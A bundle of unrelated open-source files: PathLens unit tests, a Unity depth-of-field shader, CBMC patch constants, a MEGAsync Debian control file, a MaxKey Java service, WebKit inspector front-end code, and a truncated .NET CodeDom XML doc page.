describe('PathLens', function () {
var testJS, testLens;
beforeEach(function () {
testJS = {
a: {
b: 'c'
}
};
testLens = new PathLens('a.b');
});
describe('#get', function () {
it('should return c', function () {
testLens.get(testJS).should.equal('c');
});
});
describe('#set', function () {
it('should return a new object with modified obj.a.b', function () {
testLens.set(testJS, 9).a.b.should.equal(9);
});
it('should add a property even if it isnt there', function () {
var lens = new PathLens('a.b.c.d.e.f');
lens.set({a : { b: 'c' } }, 'hello').a.b.c.d.e.f.should.equal('hello');
});
});
describe('#map', function () {
it('should turn testJS.a.b into cat', function () {
testLens.map(testJS, function (attr) { return attr + 'at'; }).a.b.should.equal('cat');
});
it('should not modify a deeply nested value if it doesnt exist', function () {
var lens = new PathLens('a.b.c.d.e.f');
lens.map({a : { b: 'c' } }, function (attr) { return attr; }).a.b.should.not.have.property('c');
});
it('should return a new object with modified obj.a.b', function () {
var _ = testLens.map({ a : { b : 'c' } }, function (attr) { return attr + 'at'; });
testJS.a.b.should.equal('c');
});
it('should create object structure if necessary', function () {
testLens.map(undefined, function(attr) { return attr + 'at'; }).a.b.should.equal('undefinedat');
});
});
describe('#PathLens.Unsafe', function () {
describe('#get', function () {
var lens = new PathLens.Unsafe('a.b');
it('should not fail when trying to get an attribute that exists', function () {
lens.get({a: { b: 10}}).should.equal(10);
});
it('should fail when trying to get an attribute that does not exist', function () {
try {
lens.get({});
} catch (ex) {
ex.message.should.equal('Cannot read property \'b\' of undefined');
}
});
});
describe('#set', function () {
var lens = new PathLens.Unsafe('a.b');
it('should not fail when trying to set an attribute that exists', function () {
lens.set({a: { b: 10}}, 20).a.b.should.equal(20);
});
it('should fail when trying to set an attribute that does not exist', function () {
try {
lens.set({}, 10);
} catch (ex) {
ex.message.should.equal('Cannot read property \'b\' of undefined');
}
});
});
});
describe('#deriveLenses', function () {
var obj;
beforeEach(function () {
obj = { a: { b: { c: { d: { e: 'hello' }, f: 10 }}}};
});
it('should return lenses for each path in object', function () {
var lenses = PathLens.deriveLenses(obj),
paths = _.keys(lenses);
utils.testArrayEquals(
paths,
[ 'a', 'a.b', 'a.b.c', 'a.b.c.d', 'a.b.c.d.e', 'a.b.c.f' ]
);
lenses['a.b.c.d.e'].get(obj).should.equal('hello');
});
it('should not include array indices', function () {
obj.a.b.c.d.e = [1, 2, 3, 4, 5];
var lenses = PathLens.deriveLenses(obj),
paths = _.keys(lenses);
utils.testArrayEquals(
paths,
[ 'a', 'a.b', 'a.b.c', 'a.b.c.d', 'a.b.c.d.e', 'a.b.c.f' ]
);
utils.testArrayEquals(lenses['a.b.c.d.e'].get(obj), [1, 2, 3, 4, 5]);
});
});
describe('#addPath', function () {
var obj = { a: 1, b : { c: 2 }},
lens = new PathLens('a').addPath('b.c').view(obj);
it('should get properly', function () {
utils.testArrayEquals(
lens.get(),
[1, 2]
);
});
it('should map properly', function () {
expect(lens.map(function (elem) { return elem * 2; })).to.eql({
a: 2,
b: {
c: 4
}
});
});
});
describe('#composePath', function () {
var obj = { a: 1, b : { c: 2 }},
lens = new PathLens('b').composePath('c').view(obj);
it('should compose properly with an IndexedLens', function () {
var arr = [{a: 'foo'}];
headLens.composePath('a').view(arr).get().should.equal('foo');
});
it('should get properly', function () {
expect(lens.get()).to.equal(2);
});
it('should map properly', function () {
expect(lens.map(function (elem) { return elem * 2; })).to.eql({
a: 1,
b: {
c: 4
}
});
});
it('should still throw errors if unsafe flag is set', function () {
var failLens = new PathLens.Unsafe('b').composePath('d.e').view(obj);
expect(function () {
failLens.get();
}).to.throw(TypeError, 'Cannot read property \'e\' of undefined');
});
});
});
| {
"pile_set_name": "Github"
} |
#ifndef __DEPTH_OF_FIELD__
#define __DEPTH_OF_FIELD__
#if SHADER_TARGET >= 50
// Use separate texture/sampler objects on Shader Model 5.0
#define SEPARATE_TEXTURE_SAMPLER
#define DOF_DECL_TEX2D(tex) Texture2D tex; SamplerState sampler##tex
#define DOF_TEX2D(tex, coord) tex.Sample(sampler##tex, coord)
#else
#define DOF_DECL_TEX2D(tex) sampler2D tex
#define DOF_TEX2D(tex, coord) tex2D(tex, coord)
#endif
#include "Common.cginc"
#include "DiskKernels.cginc"
DOF_DECL_TEX2D(_CameraDepthTexture);
DOF_DECL_TEX2D(_CameraMotionVectorsTexture);
DOF_DECL_TEX2D(_CoCTex);
// Camera parameters
float _Distance;
float _LensCoeff; // f^2 / (N * (S1 - f) * film_width * 2)
float _MaxCoC;
float _RcpMaxCoC;
float _RcpAspect;
half3 _TaaParams; // Jitter.x, Jitter.y, Blending
struct VaryingsDOF
{
float4 pos : SV_POSITION;
half2 uv : TEXCOORD0;
half2 uvAlt : TEXCOORD1;
};
// Common vertex shader with single pass stereo rendering support
VaryingsDOF VertDOF(AttributesDefault v)
{
    half2 uvAlt = v.texcoord;
#if UNITY_UV_STARTS_AT_TOP
    // A negative texel-size y means the render target is flipped; undo it
    // for the secondary UV so dependent textures line up.
    if (_MainTex_TexelSize.y < 0.0) uvAlt.y = 1.0 - uvAlt.y;
#endif
    VaryingsDOF o;
    o.pos = UnityObjectToClipPos(v.vertex);
#if defined(UNITY_SINGLE_PASS_STEREO)
    // Remap both UV sets into the active eye's sub-rect.
    o.uv = UnityStereoScreenSpaceUVAdjust(v.texcoord, _MainTex_ST);
    o.uvAlt = UnityStereoScreenSpaceUVAdjust(uvAlt, _MainTex_ST);
#else
    o.uv = v.texcoord;
    o.uvAlt = uvAlt;
#endif
    return o;
}
// CoC calculation
half4 FragCoC(VaryingsDOF i) : SV_Target
{
    // Linear eye-space depth at this pixel.
    float eyeDepth = LinearEyeDepth(DOF_TEX2D(_CameraDepthTexture, i.uv));
    // Signed circle-of-confusion radius; max() guards against division by zero.
    half radius = (eyeDepth - _Distance) * _LensCoeff / max(eyeDepth, 1e-5);
    // Remap [-_MaxCoC, _MaxCoC] into [0, 1] for storage in the CoC texture.
    return saturate(radius * 0.5 * _RcpMaxCoC + 0.5);
}
// Temporal filter
// Stabilizes the CoC buffer over time: dilates the CoC toward the nearest of
// four neighbors, reprojects last frame's CoC through the motion vectors,
// clamps the history to the local neighborhood, then blends by _TaaParams.z.
half4 FragTempFilter(VaryingsDOF i) : SV_Target
{
    // (1 texel, 1 texel, 0) — swizzled below to form axis-aligned offsets.
    float3 uvOffs = _MainTex_TexelSize.xyy * float3(1, 1, 0);
#if defined(SEPARATE_TEXTURE_SAMPLER)
    // Fetch the four cross neighbors with two Gather operations.
    half4 cocTL = _CoCTex.GatherRed(sampler_CoCTex, i.uv - uvOffs.xy * 0.5); // top-left
    half4 cocBR = _CoCTex.GatherRed(sampler_CoCTex, i.uv + uvOffs.xy * 0.5); // bottom-right
    half coc1 = cocTL.x; // top
    half coc2 = cocTL.z; // left
    half coc3 = cocBR.x; // bottom
    half coc4 = cocBR.z; // right
#else
    // Fallback: four individual point samples.
    half coc1 = DOF_TEX2D(_CoCTex, i.uv - uvOffs.xz).r; // top
    half coc2 = DOF_TEX2D(_CoCTex, i.uv - uvOffs.zy).r; // left
    half coc3 = DOF_TEX2D(_CoCTex, i.uv + uvOffs.zy).r; // bottom
    half coc4 = DOF_TEX2D(_CoCTex, i.uv + uvOffs.xz).r; // right
#endif
    // Dejittered center sample.
    half coc0 = DOF_TEX2D(_CoCTex, i.uv - _TaaParams.xy).r;
    // CoC dilation: determine the closest point in the four neighbors.
    // closest.xy holds the UV offset of the winner, closest.z its CoC.
    float3 closest = float3(0, 0, coc0);
    closest = coc1 < closest.z ? float3(-uvOffs.xz, coc1) : closest;
    closest = coc2 < closest.z ? float3(-uvOffs.zy, coc2) : closest;
    closest = coc3 < closest.z ? float3(+uvOffs.zy, coc3) : closest;
    closest = coc4 < closest.z ? float3(+uvOffs.xz, coc4) : closest;
    // Sample the history buffer with the motion vector at the closest point.
    float2 motion = DOF_TEX2D(_CameraMotionVectorsTexture, i.uv + closest.xy).xy;
    half cocHis = DOF_TEX2D(_MainTex, i.uv - motion).r;
    // Neighborhood clamping: reject history outside the current min/max
    // to avoid ghosting.
    half cocMin = closest.z;
    half cocMax = max(max(max(max(coc0, coc1), coc2), coc3), coc4);
    cocHis = clamp(cocHis, cocMin, cocMax);
    // Blend with the history.
    return lerp(coc0, cocHis, _TaaParams.z);
}
// Prefilter: downsampling and premultiplying.
// Produces a half-resolution color buffer whose RGB is a CoC/luma-weighted
// average of four source texels and whose alpha carries the dominant signed
// CoC (scaled by _MaxCoC).
half4 FragPrefilter(VaryingsDOF i) : SV_Target
{
#if defined(SEPARATE_TEXTURE_SAMPLER)
    // Sample source colors.
    // Gather one channel at a time, then reassemble the four texels.
    half4 c_r = _MainTex.GatherRed (sampler_MainTex, i.uv);
    half4 c_g = _MainTex.GatherGreen(sampler_MainTex, i.uv);
    half4 c_b = _MainTex.GatherBlue (sampler_MainTex, i.uv);
    half3 c0 = half3(c_r.x, c_g.x, c_b.x);
    half3 c1 = half3(c_r.y, c_g.y, c_b.y);
    half3 c2 = half3(c_r.z, c_g.z, c_b.z);
    half3 c3 = half3(c_r.w, c_g.w, c_b.w);
    // Sample CoCs.
    // Expand from the stored [0, 1] range back to signed [-1, 1].
    half4 cocs = _CoCTex.Gather(sampler_CoCTex, i.uvAlt) * 2.0 - 1.0;
    half coc0 = cocs.x;
    half coc1 = cocs.y;
    half coc2 = cocs.z;
    half coc3 = cocs.w;
#else
    // Fallback: four bilinear taps at half-texel offsets.
    float3 duv = _MainTex_TexelSize.xyx * float3(0.5, 0.5, -0.5);
    // Sample source colors.
    half3 c0 = DOF_TEX2D(_MainTex, i.uv - duv.xy).rgb;
    half3 c1 = DOF_TEX2D(_MainTex, i.uv - duv.zy).rgb;
    half3 c2 = DOF_TEX2D(_MainTex, i.uv + duv.zy).rgb;
    half3 c3 = DOF_TEX2D(_MainTex, i.uv + duv.xy).rgb;
    // Sample CoCs.
    half coc0 = DOF_TEX2D(_CoCTex, i.uvAlt - duv.xy).r * 2.0 - 1.0;
    half coc1 = DOF_TEX2D(_CoCTex, i.uvAlt - duv.zy).r * 2.0 - 1.0;
    half coc2 = DOF_TEX2D(_CoCTex, i.uvAlt + duv.zy).r * 2.0 - 1.0;
    half coc3 = DOF_TEX2D(_CoCTex, i.uvAlt + duv.xy).r * 2.0 - 1.0;
#endif
    // Apply CoC and luma weights to reduce bleeding and flickering.
    float w0 = abs(coc0) / (Max3(c0) + 1.0);
    float w1 = abs(coc1) / (Max3(c1) + 1.0);
    float w2 = abs(coc2) / (Max3(c2) + 1.0);
    float w3 = abs(coc3) / (Max3(c3) + 1.0);
    // Weighted average of the color samples
    half3 avg = c0 * w0 + c1 * w1 + c2 * w2 + c3 * w3;
    avg /= max(w0 + w1 + w2 + w3, 1e-5); // guard against all-zero weights
    // Select the largest CoC value.
    // Keep the sign of whichever extreme (near/far) has the larger magnitude.
    half coc_min = Min4(coc0, coc1, coc2, coc3);
    half coc_max = Max4(coc0, coc1, coc2, coc3);
    half coc = (-coc_min > coc_max ? coc_min : coc_max) * _MaxCoC;
    // Premultiply CoC again.
    // Fades out nearly-in-focus pixels so they don't bleed into the blur.
    avg *= smoothstep(0, _MainTex_TexelSize.y * 2, abs(coc));
#if defined(UNITY_COLORSPACE_GAMMA)
    avg = GammaToLinearSpace(avg);
#endif
    return half4(avg, coc);
}
// Bokeh filter with disk-shaped kernels
// Accumulates background (far-field) and foreground (near-field) bokeh
// separately over the disk kernel, then composites FG over BG by the
// foreground coverage alpha.
half4 FragBlur(VaryingsDOF i) : SV_Target
{
    half4 samp0 = DOF_TEX2D(_MainTex, i.uv);
    half4 bgAcc = 0.0; // Background: far field bokeh
    half4 fgAcc = 0.0; // Foreground: near field bokeh
    UNITY_LOOP for (int si = 0; si < kSampleCount; si++)
    {
        // Kernel offset scaled to the maximum CoC radius;
        // x is corrected by _RcpAspect to stay circular on screen.
        float2 disp = kDiskKernel[si] * _MaxCoC;
        float dist = length(disp);
        float2 duv = float2(disp.x * _RcpAspect, disp.y);
        half4 samp = DOF_TEX2D(_MainTex, i.uv + duv);
        // BG: Compare CoC of the current sample and the center sample
        // and select smaller one.
        half bgCoC = max(min(samp0.a, samp.a), 0.0);
        // Compare the CoC to the sample distance.
        // Add a small margin to smooth out.
        const half margin = _MainTex_TexelSize.y * 2;
        half bgWeight = saturate((bgCoC - dist + margin) / margin);
        half fgWeight = saturate((-samp.a - dist + margin) / margin);
        // Cut influence from focused areas because they're darkened by CoC
        // premultiplying. This is only needed for near field.
        fgWeight *= step(_MainTex_TexelSize.y, -samp.a);
        // Accumulation
        bgAcc += half4(samp.rgb, 1.0) * bgWeight;
        fgAcc += half4(samp.rgb, 1.0) * fgWeight;
    }
    // Get the weighted average.
    bgAcc.rgb /= bgAcc.a + (bgAcc.a == 0.0); // zero-div guard
    fgAcc.rgb /= fgAcc.a + (fgAcc.a == 0.0);
    // BG: Calculate the alpha value only based on the center CoC.
    // This is a rather aggressive approximation but provides stable results.
    bgAcc.a = smoothstep(_MainTex_TexelSize.y, _MainTex_TexelSize.y * 2.0, samp0.a);
    // FG: Normalize the total of the weights.
    fgAcc.a *= UNITY_PI / kSampleCount;
    // Alpha premultiplying
    half alpha = saturate(fgAcc.a);
    half3 rgb = lerp(bgAcc.rgb, fgAcc.rgb, alpha);
    return half4(rgb, alpha);
}
// Postfilter blur
half4 FragPostBlur(VaryingsDOF i) : SV_Target
{
    // 9 tap tent filter with 4 bilinear samples
    const float4 st = _MainTex_TexelSize.xyxy * float4(0.5, 0.5, -0.5, 0);
    half4 sum = DOF_TEX2D(_MainTex, i.uv - st.xy)
              + DOF_TEX2D(_MainTex, i.uv - st.zy)
              + DOF_TEX2D(_MainTex, i.uv + st.zy)
              + DOF_TEX2D(_MainTex, i.uv + st.xy);
    // Average of the four bilinear taps.
    return sum * 0.25;
}
#endif // __DEPTH_OF_FIELD__
| {
"pile_set_name": "Github"
} |
#!/usr/bin/env python3
#
# Constants for the generation of patches for CBMC proofs.
#
# Copyright (C) 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os

# Directory containing this file; every patch path is resolved relative to it.
PATCHES_DIR = os.path.dirname(os.path.abspath(__file__))

# Relative path components from PATCHES_DIR to the proof harness directory.
shared_prefix = [
    "."
]

# Relative path components from PATCHES_DIR to the MSVC-MingW port layer.
shared_prefix_port = [
    "..", "..", "..", "..", "FreeRTOS", "Source", "portable", "MSVC-MingW"
]

absolute_prefix = os.path.abspath(os.path.join(PATCHES_DIR, *shared_prefix))
absolute_prefix_port = os.path.abspath(os.path.join(PATCHES_DIR, *shared_prefix_port))

# Header files that the generated CBMC patches apply to.
HEADERS = [
    os.path.join(absolute_prefix, name)
    for name in ("FreeRTOSConfig.h", "FreeRTOSIPConfig.h")
] + [os.path.join(absolute_prefix_port, "portmacro.h")]
| {
"pile_set_name": "Github"
} |
Format: 1.0
Source: megasync
Binary: megasync
Standards-Version: 3.6.1
Architecture: any
Version: MEGASYNC_VERSION
DEBTRANSFORM-RELEASE: 1
Maintainer: MEGA Linux Team <[email protected]>
Homepage: https://mega.nz/#sync
Build-Depends: ffmpeg-mega, pdfium-mega [!i386], libzen-dev, libmediainfo-dev, debhelper, qtbase5-dev, qt5-qmake, qt4-linguist-tools, libqt5dbus5, libqt5svg5-dev, libqt5x11extras5-dev, libcrypto++-dev, libraw-dev, libc-ares-dev, libssl-dev, libsqlite3-dev, zlib1g-dev, wget, dh-autoreconf, cdbs, unzip, wget, libtool-bin (>= 2.4.2-1.10) | libtool (<< 2.4.2-1.10)
Package-List:
megasync deb gnome optional
Files:
00000000000000000000000000000000 0 megasync_MEGASYNC_VERSION.tar.gz
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2011 Google Inc. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are
* met:
*
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following disclaimer
* in the documentation and/or other materials provided with the
* distribution.
* * Neither the name of Google Inc. nor the names of its
* contributors may be used to endorse or promote products derived from
* this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
* OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
* LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/**
 * Bridge through which the embedding browser drives the inspector
 * front-end. Commands that arrive before the panels exist are queued in
 * _pendingCommands and replayed by loadCompleted().
 */
InspectorFrontendAPI = {
    _pendingCommands: [],

    isDebuggingEnabled: function()
    {
        return WebInspector.panels.scripts.debuggingEnabled;
    },

    setDebuggingEnabled: function(enabled)
    {
        if (!enabled) {
            WebInspector.panels.scripts.disableDebugging();
            return;
        }
        WebInspector.panels.scripts.enableDebugging();
        WebInspector.inspectorView.setCurrentPanel(WebInspector.panels.scripts);
    },

    isTimelineProfilingEnabled: function()
    {
        return WebInspector.panels.timeline.timelineProfilingEnabled;
    },

    setTimelineProfilingEnabled: function(enabled)
    {
        WebInspector.panels.timeline.setTimelineProfilingEnabled(enabled);
    },

    isProfilingJavaScript: function()
    {
        var profileType = WebInspector.CPUProfileType.instance;
        return profileType && profileType.isRecordingProfile();
    },

    startProfilingJavaScript: function()
    {
        WebInspector.panels.profiles.enableProfiler();
        WebInspector.inspectorView.setCurrentPanel(WebInspector.panels.profiles);
        var profileType = WebInspector.CPUProfileType.instance;
        if (profileType)
            profileType.startRecordingProfile();
    },

    stopProfilingJavaScript: function()
    {
        var profileType = WebInspector.CPUProfileType.instance;
        if (profileType)
            profileType.stopRecordingProfile();
        WebInspector.inspectorView.setCurrentPanel(WebInspector.panels.profiles);
    },

    setAttachedWindow: function(attached)
    {
        WebInspector.attached = attached;
    },

    showConsole: function()
    {
        WebInspector.inspectorView.setCurrentPanel(WebInspector.panels.console);
    },

    showMainResourceForFrame: function(frameId)
    {
        // FIXME: Implement this to show the source code for the main resource of a given frame.
    },

    showResources: function()
    {
        WebInspector.inspectorView.setCurrentPanel(WebInspector.panels.resources);
    },

    setDockingUnavailable: function(unavailable)
    {
        WebInspector.setDockingUnavailable(unavailable);
    },

    // Runs the named command immediately when the front-end is ready;
    // otherwise queues the untouched signature for loadCompleted().
    dispatch: function(signature)
    {
        if (!WebInspector.panels) {
            InspectorFrontendAPI._pendingCommands.push(signature);
            return;
        }
        var methodName = signature.shift();
        return InspectorFrontendAPI[methodName].apply(InspectorFrontendAPI, signature);
    },

    // Replays commands queued before load; clears the queue afterwards.
    loadCompleted: function()
    {
        var api = InspectorFrontendAPI;
        for (var i = 0; i < api._pendingCommands.length; ++i)
            api.dispatch(api._pendingCommands[i]);
        api._pendingCommands = [];
    }
}
| {
"pile_set_name": "Github"
} |
os_family = bsd
arch = sparc
arch_model = sparc
os_arch = bsd_sparc
os_arch_model = bsd_sparc
lib_arch = sparc
compiler = gcc
sysdefs = -D_ALLBSD_SOURCE -D_GNU_SOURCE -DSPARC
| {
"pile_set_name": "Github"
} |
/*
* Copyright [2020] [MaxKey of copyright http://www.maxkey.top]
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.maxkey.persistence.service;
import org.apache.mybatis.jpa.persistence.JpaBaseService;
import org.maxkey.domain.Accounts;
import org.maxkey.persistence.mapper.AccountsMapper;
import org.springframework.stereotype.Service;
@Service
public class AccountsService extends JpaBaseService<Accounts>{

	/**
	 * Service layer for {@link Accounts} entities; delegates persistence
	 * to {@link AccountsMapper} through the generic JPA base service.
	 */
	public AccountsService() {
		super(AccountsMapper.class);
	}

	/**
	 * Returns the mapper cast to its concrete type so callers can reach
	 * the Accounts-specific query methods it declares.
	 */
	@Override
	public AccountsMapper getMapper() {
		return (AccountsMapper) super.getMapper();
	}
}
| {
"pile_set_name": "Github"
} |
<Type Name="CodeObjectCreateExpression" FullName="System.CodeDom.CodeObjectCreateExpression">
<TypeSignature Language="C#" Value="public class CodeObjectCreateExpression : System.CodeDom.CodeExpression" />
<TypeSignature Language="ILAsm" Value=".class public auto ansi beforefieldinit CodeObjectCreateExpression extends System.CodeDom.CodeExpression" FrameworkAlternate="dotnet-plat-ext-2.1;dotnet-plat-ext-2.2;dotnet-plat-ext-3.0;dotnet-plat-ext-3.1;dotnet-plat-ext-5.0;net-5.0;netcore-3.0;netcore-3.1" />
<TypeSignature Language="DocId" Value="T:System.CodeDom.CodeObjectCreateExpression" />
<TypeSignature Language="VB.NET" Value="Public Class CodeObjectCreateExpression
Inherits CodeExpression" />
<TypeSignature Language="C++ CLI" Value="public ref class CodeObjectCreateExpression : System::CodeDom::CodeExpression" />
<TypeSignature Language="F#" Value="type CodeObjectCreateExpression = class
 inherit CodeExpression" />
<TypeSignature Language="ILAsm" Value=".class public auto ansi serializable beforefieldinit CodeObjectCreateExpression extends System.CodeDom.CodeExpression" FrameworkAlternate="netframework-1.1;netframework-2.0;netframework-3.0;netframework-3.5;netframework-4.0;netframework-4.5;netframework-4.5.1;netframework-4.5.2;netframework-4.6;netframework-4.6.1;netframework-4.6.2;netframework-4.7;netframework-4.7.1;netframework-4.7.2;netframework-4.8;xamarinmac-3.0" />
<AssemblyInfo>
<AssemblyName>System</AssemblyName>
<AssemblyVersion>1.0.5000.0</AssemblyVersion>
<AssemblyVersion>2.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
</AssemblyInfo>
<AssemblyInfo>
<AssemblyName>System.CodeDom</AssemblyName>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.1.0</AssemblyVersion>
<AssemblyVersion>4.0.2.0</AssemblyVersion>
<AssemblyVersion>4.0.3.0</AssemblyVersion>
<AssemblyVersion>5.0.0.0</AssemblyVersion>
</AssemblyInfo>
<Base>
<BaseTypeName>System.CodeDom.CodeExpression</BaseTypeName>
</Base>
<Interfaces />
<Attributes>
<Attribute FrameworkAlternate="netframework-1.1;netframework-2.0;netframework-3.0;netframework-3.5;netframework-4.0;netframework-4.5;netframework-4.5.1;netframework-4.5.2;netframework-4.6;netframework-4.6.1;netframework-4.6.2;netframework-4.7;netframework-4.7.1;netframework-4.7.2;netframework-4.8;xamarinmac-3.0">
<AttributeName Language="C#">[System.Runtime.InteropServices.ClassInterface(System.Runtime.InteropServices.ClassInterfaceType.AutoDispatch)]</AttributeName>
<AttributeName Language="F#">[<System.Runtime.InteropServices.ClassInterface(System.Runtime.InteropServices.ClassInterfaceType.AutoDispatch)>]</AttributeName>
</Attribute>
<Attribute FrameworkAlternate="netframework-1.1;netframework-2.0;netframework-3.0;netframework-3.5;netframework-4.0;netframework-4.5;netframework-4.5.1;netframework-4.5.2;netframework-4.6;netframework-4.6.1;netframework-4.6.2;netframework-4.7;netframework-4.7.1;netframework-4.7.2;netframework-4.8;xamarinmac-3.0">
<AttributeName Language="C#">[System.Runtime.InteropServices.ComVisible(true)]</AttributeName>
<AttributeName Language="F#">[<System.Runtime.InteropServices.ComVisible(true)>]</AttributeName>
</Attribute>
<Attribute FrameworkAlternate="netframework-1.1;netframework-2.0;netframework-3.0;netframework-3.5;netframework-4.0;netframework-4.5;netframework-4.5.1;netframework-4.5.2;netframework-4.6;netframework-4.6.1;netframework-4.6.2;netframework-4.7;netframework-4.7.1;netframework-4.7.2;netframework-4.8;xamarinmac-3.0">
<AttributeName Language="C#">[System.Serializable]</AttributeName>
<AttributeName Language="F#">[<System.Serializable>]</AttributeName>
</Attribute>
</Attributes>
<Docs>
<summary>Represents an expression that creates a new instance of a type.</summary>
<remarks>
        <format type="text/markdown"><![CDATA[
[!code-csharp[CodeMultiExample#5](~/samples/snippets/csharp/VS_Snippets_CLR/CodeMultiExample/CS/codemultiexample.cs#5)]
[!code-vb[CodeMultiExample#5](~/samples/snippets/visualbasic/VS_Snippets_CLR/CodeMultiExample/VB/codemultiexample.vb#5)]
]]></format>
</remarks>
</Docs>
<Members>
<MemberGroup MemberName=".ctor">
<AssemblyInfo>
<AssemblyName>System</AssemblyName>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
</AssemblyInfo>
<Docs>
<summary>Initializes a new instance of the <see cref="T:System.CodeDom.CodeObjectCreateExpression" /> class.</summary>
</Docs>
</MemberGroup>
<Member MemberName=".ctor">
<MemberSignature Language="C#" Value="public CodeObjectCreateExpression ();" />
<MemberSignature Language="ILAsm" Value=".method public hidebysig specialname rtspecialname instance void .ctor() cil managed" />
<MemberSignature Language="DocId" Value="M:System.CodeDom.CodeObjectCreateExpression.#ctor" />
<MemberSignature Language="VB.NET" Value="Public Sub New ()" />
<MemberSignature Language="C++ CLI" Value="public:
 CodeObjectCreateExpression();" />
<MemberType>Constructor</MemberType>
<AssemblyInfo>
<AssemblyName>System</AssemblyName>
<AssemblyVersion>1.0.5000.0</AssemblyVersion>
<AssemblyVersion>2.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
</AssemblyInfo>
<AssemblyInfo>
<AssemblyName>System.CodeDom</AssemblyName>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.1.0</AssemblyVersion>
<AssemblyVersion>4.0.2.0</AssemblyVersion>
<AssemblyVersion>4.0.3.0</AssemblyVersion>
<AssemblyVersion>5.0.0.0</AssemblyVersion>
</AssemblyInfo>
<Parameters />
<Docs>
<summary>Initializes a new instance of the <see cref="T:System.CodeDom.CodeObjectCreateExpression" /> class.</summary>
<remarks>To be added.</remarks>
</Docs>
</Member>
<Member MemberName=".ctor">
<MemberSignature Language="C#" Value="public CodeObjectCreateExpression (System.CodeDom.CodeTypeReference createType, params System.CodeDom.CodeExpression[] parameters);" />
<MemberSignature Language="ILAsm" Value=".method public hidebysig specialname rtspecialname instance void .ctor(class System.CodeDom.CodeTypeReference createType, class System.CodeDom.CodeExpression[] parameters) cil managed" />
<MemberSignature Language="DocId" Value="M:System.CodeDom.CodeObjectCreateExpression.#ctor(System.CodeDom.CodeTypeReference,System.CodeDom.CodeExpression[])" />
<MemberSignature Language="VB.NET" Value="Public Sub New (createType As CodeTypeReference, ParamArray parameters As CodeExpression())" />
<MemberSignature Language="C++ CLI" Value="public:
 CodeObjectCreateExpression(System::CodeDom::CodeTypeReference ^ createType, ... cli::array <System::CodeDom::CodeExpression ^> ^ parameters);" />
<MemberSignature Language="F#" Value="new System.CodeDom.CodeObjectCreateExpression : System.CodeDom.CodeTypeReference * System.CodeDom.CodeExpression[] -> System.CodeDom.CodeObjectCreateExpression" Usage="new System.CodeDom.CodeObjectCreateExpression (createType, parameters)" />
<MemberType>Constructor</MemberType>
<AssemblyInfo>
<AssemblyName>System</AssemblyName>
<AssemblyVersion>1.0.5000.0</AssemblyVersion>
<AssemblyVersion>2.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
</AssemblyInfo>
<AssemblyInfo>
<AssemblyName>System.CodeDom</AssemblyName>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.1.0</AssemblyVersion>
<AssemblyVersion>4.0.2.0</AssemblyVersion>
<AssemblyVersion>4.0.3.0</AssemblyVersion>
<AssemblyVersion>5.0.0.0</AssemblyVersion>
</AssemblyInfo>
<Parameters>
<Parameter Name="createType" Type="System.CodeDom.CodeTypeReference" />
<Parameter Name="parameters" Type="System.CodeDom.CodeExpression[]">
<Attributes>
<Attribute FrameworkAlternate="dotnet-plat-ext-2.1">
<AttributeName Language="C#">[System.ParamArray]</AttributeName>
<AttributeName Language="F#">[<System.ParamArray>]</AttributeName>
</Attribute>
</Attributes>
</Parameter>
</Parameters>
<Docs>
